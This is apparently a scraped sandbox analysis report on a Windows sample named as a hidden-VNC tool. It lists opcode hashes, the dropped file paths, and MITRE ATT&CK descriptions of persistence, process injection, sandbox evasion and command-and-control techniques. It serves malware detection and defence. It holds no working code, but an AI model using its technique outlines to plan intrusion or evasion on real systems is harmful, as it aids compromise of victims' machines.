Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab291c1b57f420d9f6576726b8abee5ea376dafc273d655bc08a7895df12a0c
Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
Opcode Fuzzy Hash: 7ab291c1b57f420d9f6576726b8abee5ea376dafc273d655bc08a7895df12a0c
Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50

Function 060A81B2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d756f2241c73780e4f3fdc651719b80ad754704d8e5a082db7955d9172438f7
Instruction ID: 52cebe58dc6789b111b4c22328ee34d35e56479fc59477ba67c21b3e087cdc62
Opcode Fuzzy Hash: 9d756f2241c73780e4f3fdc651719b80ad754704d8e5a082db7955d9172438f7
Instruction Fuzzy Hash: 02D092349426198FDB90DF64DE54B9CBBB1FB45345F0042D4E00967264DB705E85CF40

Function 00F73090 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
Instruction ID: 308734e347fe5fbfc39d01466d26648a0473cab39bdc6a53ba3d68073832f9aa
Opcode Fuzzy Hash: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
Instruction Fuzzy Hash: 93B01230240208CFC200DB5DD444C0033FCAF49A0434000D0F1098B731C721FC00CA40

Function 00F7308F Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61265b489f6c724067a9300400ece4ccc94db2058da7a267d013a08bafd017cc
Instruction ID: 231c056f55285bda17e34b29d34017af29fa7600199d26e48846b216a7327eb0
Opcode Fuzzy Hash: 61265b489f6c724067a9300400ece4ccc94db2058da7a267d013a08bafd017cc
Instruction Fuzzy Hash: 87B092342884448FC700CB79D484C883BB0AF5A20431001D9F04ACBA32C2629801CE00

Function 00F70888 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8acea49a797b1c19a90b6cf1d89039a1eb956e62c8090fd44a6ab0791359fd4
Instruction ID: 8c2d7cef1ef44f6d176690ed901e4c0de4a9e802361fe7784dad5550daf62c1c
Opcode Fuzzy Hash: e8acea49a797b1c19a90b6cf1d89039a1eb956e62c8090fd44a6ab0791359fd4
Instruction Fuzzy Hash: F7A00171064A088BD6403FA5BC0D75DBB6CAE46A3A7C08161B50E826229A6568149A95

Function 00F708B0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a43911b7ce9bc7dd53507a324c0c129540aae1dfa69641e28f2c82daab43cde
Instruction ID: a33b504f4f4b8e3e14531d90555ab795b58383adf8388b9bab534295a2ff202e
Opcode Fuzzy Hash: 4a43911b7ce9bc7dd53507a324c0c129540aae1dfa69641e28f2c82daab43cde
Instruction Fuzzy Hash: 5F900235444A0C8B45402795790D75DF76C95455197808052A50E425239A6564104595

Function 00F708AF Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b447f1562a8889e7bc4cf2e9a90ae86c70a875c779c7f6fdf988f290730ca2db
Instruction ID: d1e97f18c438c398dc4ba97159485ccb8ce1769db11adf4b506be0d5801c5ee6
Opcode Fuzzy Hash: b447f1562a8889e7bc4cf2e9a90ae86c70a875c779c7f6fdf988f290730ca2db
Instruction Fuzzy Hash: 2CA0223C88C288AE8F0003B0388CACCFF308802008300828FE80F82833C2B200008E00

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hvnc-CR-SCR-0710.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Roaming\msql2.exe

C:\Users\user\AppData\Roaming\msql2.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
hvnc-CR-SCR-0710.bin.exe

Function 02DF78A0 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Function 064FB548 Relevance: 4.3, Strings: 3, Instructions: 543
COMMON

Function 06434410 Relevance: 3.1, Strings: 2, Instructions: 644
COMMON

Function 064A06CA Relevance: 3.8, Strings: 3, Instructions: 78
COMMON

Function 064018C0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre